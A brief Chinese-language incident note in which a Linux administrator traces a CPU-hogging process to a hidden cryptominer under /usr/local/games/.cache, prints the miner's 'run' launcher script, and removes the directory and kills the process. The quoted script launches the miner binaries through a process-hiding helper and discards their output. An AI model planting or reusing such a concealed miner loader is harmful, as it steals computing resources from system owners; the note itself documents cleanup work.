客户端登录服务器,使用非常卡顿,查看服务器使用情况
有进程占用cpu非常严重
查看进程所在目录
[root@176-18-0-10 ~]# pwdx 1268
1268: /usr/local/games/.cache查看病毒目录和执行文件内容
[root@176-10-0-10 ~]# ls /usr/local/games/.cache
a h32 h64 run s s32 stak3 stakcentosold stakubuntunew upd x
[root@176-10-0-10 ~]# cat /usr/local/games/.cache/run
#!/bin/bash
#ps aux | grep -vw xmr-stak | awk '{if($3>40.0) print $2}' | while read procid
#do
#kill -9 $procid
#done
proc=`nproc`
ARCH=`uname -m`
HIDE="s"
OS="ubuntunew"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./stak3/ld-linux.so.2 --library-path stak3 ./s32 >>/dev/null &
elif [ "$OS" == "universal" ]; then
./h64 -s $HIDE ./stakubuntunew/system --library-path stakubuntunew ./s >>/dev/null &
elif [ "$OS" == "centosold" ]; then
./h64 -s $HIDE ./stakcentosold/system --library-path stakcentosold ./s >>/dev/null &
elif [ "$OS" == "ubuntuold" ]; then
./h64 -s $HIDE ./stakubuntunew/system --library-path stakubuntunew ./s >>/dev/null &
elif [ "$OS" == "ubuntunew" ]; then
./h64 -s $HIDE ./stakubuntunew/system --library-path stakubuntunew ./s >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./stakubuntunew/system --library-path stakubuntunew ./s >>/dev/null &
fi
echo $! > /tmp/.bash.pid查看是否有陌生服务器连接服务器
netstat -antp
确定是病毒,然后就是删除病毒
要删除的东西:木马所在目录(/usr/local/games/.cache),木马进程(1268)
rm -fr /usr/local/games/.cache
kill -9 1268再查看进程使用情况,完全正常
